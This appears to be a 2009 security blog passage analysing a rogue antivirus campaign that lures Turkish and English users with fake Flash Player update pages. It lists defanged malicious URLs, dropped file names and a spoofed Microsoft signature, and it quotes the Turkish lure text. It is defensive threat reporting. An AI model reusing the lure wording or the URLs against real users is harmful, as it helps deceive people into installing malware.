hxxp://video-trailers.net/hotnews.php?id=Mr._Bean -->
hxxp://watch-for-free.net/hotnews.php?id=Mr._Bean&was=1 -->
hxxp://premier-tube-site.com/xplay.php?id=40018

Update: an excellent post describing related activity and infrastructure at the GazTranzitStroyInfo site and related russian ISP's. And the group moves their malware to yet another provider.

Windows Security Center and Virus (I-Worm.Trojan.b)

2009-05-12T11:52:00.000-07:00

What is a virus i-worm trojan anyways? Well, it's not a legitimate detection with a valid CARO name, it's gibberish to lead a user to "Click 'Ok' to Install System Security Antivirus", either on XP:

Or with a more sleek look on Vista:

The distributors of System Security Antivirus, another rogueware or FakeAv product, are redirecting Turkish users to a site encouraging them to download the malware with a familiar scheme: To watch this video you must have the Flash Player installed.
It appears that the group is worming through Windows Live Messenger to attract downloads in increasing prevalence. We'll be investigating it in depth and posting details here.

The phony video page this time appears in Turkish, hosted on a Turkish server:
"Flash Player version uyumsuzlugu:
Tarayiciniz bu videoyu goruntuleyemiyor.
Bu videoyu izleyebilmek icin Flash Player yaziliminizin guncel olmasi gerekiyor.
Flash Player yaziliminizi guncellemek icin «Devam» butonuna tiklayiniz."

The downloaded file, flashplayerupdate_01.exe, drops and runs advhost.exe from system32 to perform the dirty work and injects adlaunch32.dll into all newly started applications.

An interesting characteristic for the flashplayer_01 executable is its use of a spoofed, invalid digital signature, supposedly signed from Microsoft:

Conveniently, the english version of the attacking web page is hosted on the same server:

Of course, the payload appears to be a bit different, serving up a doctored install_flash_player_9.04.exe package that includes the legitimate mIRC client.